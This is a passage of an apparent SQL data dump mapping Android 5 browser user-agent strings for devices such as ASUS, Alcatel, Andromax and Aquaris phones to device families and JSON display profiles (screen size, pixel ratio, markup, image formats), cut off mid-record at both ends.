Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A501 BRIGHT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A50LT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A50c+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A51f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A51w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A571VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A5_Easy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A622GL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A75) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A75A*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A9 Star) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ACTOMA ACE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AD570) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AFTT) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":960,\"screenHeight\":540,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AGM X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ALE-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ALE-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ALE-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ALE-L23) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AM402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AM407) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AM450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AM508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AM523) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AP-755G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AS-5411) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AS-5412) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AS-5431) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS ZenFone 2E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_L001) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_asus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00J-D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_T00Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_X005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_X00BD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_X013D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_X013DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_X013DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_X014D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00AD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00ADB) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00ED) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00LD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00LDD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00MD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00RD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00SD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00UD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00VD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00WD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00XS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z00YD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z010D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z010DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ASUS_Z011D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AX1010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AX1035) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; AX1065) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Alcatel) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Alcatel_4060A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Alcatel_5054O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Alcatel_5056O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Alcatel_7049D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax A16C3H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax B16C2G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax B16C2H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax C46B2G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax G36C1G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax I46D1G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Andromax I56D2G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Aqua Classic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Aquaris E4.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Aquaris E5 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Aquaris E5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Aquaris M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Aquaris X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Archos 